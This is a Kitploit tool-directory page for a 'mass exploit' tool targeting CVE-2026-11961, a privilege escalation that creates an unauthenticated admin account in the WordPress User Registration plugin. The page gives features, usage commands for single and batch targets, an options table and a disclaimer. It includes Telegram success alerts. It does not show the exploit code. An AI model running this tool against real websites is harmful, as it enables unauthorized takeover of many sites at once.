Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-11961 — CVE-2026-11961 — UserRegistration: WordPress User Registration <= 5.2.2 Privilege Escalation. Misconfigured Membership Roles → Unauthenticated Admin Creation → Site Compromise. CVSS 8.1 | Kitploit
Tools/GitHubGitHub/johenlastgen-jlg/cve-2026-11961
Privilege EscalationVulnerability ScannersVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingMisconfiguration

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
GitHub
johenlastgen-jlg/cve-2026-11961

CVE-2026-11961

CVE-2026-11961 — UserRegistration: WordPress User Registration <= 5.2.2 Privilege Escalation. Misconfigured Membership Roles → Unauthenticated Admin Creation → Site Compromise. CVSS 8.1

View Repository
113 days agoNot yet reviewed

CVE-2026-11961

Mass Exploit tool for CVE-2026-11961 affecting the WordPress User Registration & Membership plugin.

Features

  • Plugin version detection
  • Single target support
  • Batch target processing
  • Multi-thread support
  • Random or custom credentials
  • HTTP/HTTPS proxy support
  • Request timeout configuration
  • JSONL output
  • Log file support
  • Telegram notifications
  • Force mode (--force)

Usage

root@kitploit:~
# Show help
python3 mass.py -h

# Single target
python3 mass.py -u https://target.com

# Single target with custom credentials
python3 mass.py \
-u https://target.com \
--username admin \
--password "StrongPassword123!"

# Multiple targets
python3 mass.py -l targets.txt -t 20

# Save successful results
python3 mass.py -l targets.txt -o results.jsonl

# Write log file
python3 mass.py -l targets.txt --log exploit.log

# Telegram notifications
python3 mass.py \
-l targets.txt \
--tg-token YOUR_BOT_TOKEN \
--tg-chat YOUR_CHAT_ID

# Proxy
python3 mass.py \
-u https://target.com \
--proxy http://127.0.0.1:8080

# Force mode
python3 mass.py -u https://target.com --force

Options

Disclaimer

This project is provided solely for authorized security assessments, defensive security research, and vulnerability validation.

By using this software, you confirm that you have explicit authorization to assess the target systems. Unauthorized access to computer systems is prohibited and may violate applicable laws.

The author and contributors do not encourage or condone unauthorized use of this project and assume no responsibility or liability for any misuse, damage, or legal consequences resulting from its use.

Author

JohenLastGen JLG NETWORK

Download Tool
OptionDescription
-h, --helpShow help message and exit
-u, --urlSingle target URL
-l, --listFile containing target URLs (one per line)
--usernameAdministrator username (default: randomly generated)
--passwordAdministrator password (default: randomly generated)
-t, --threadsNumber of concurrent threads (default: 5)
--timeoutRequest timeout in seconds (default: 15)
-o, --outputSave successful results to a JSONL file
--logSave console logs to a file
--proxyHTTP/HTTPS proxy (e.g. http://127.0.0.1:8080)
--forceSkip version validation and continue processing
--tg-tokenTelegram Bot Token
--tg-chatTelegram Chat ID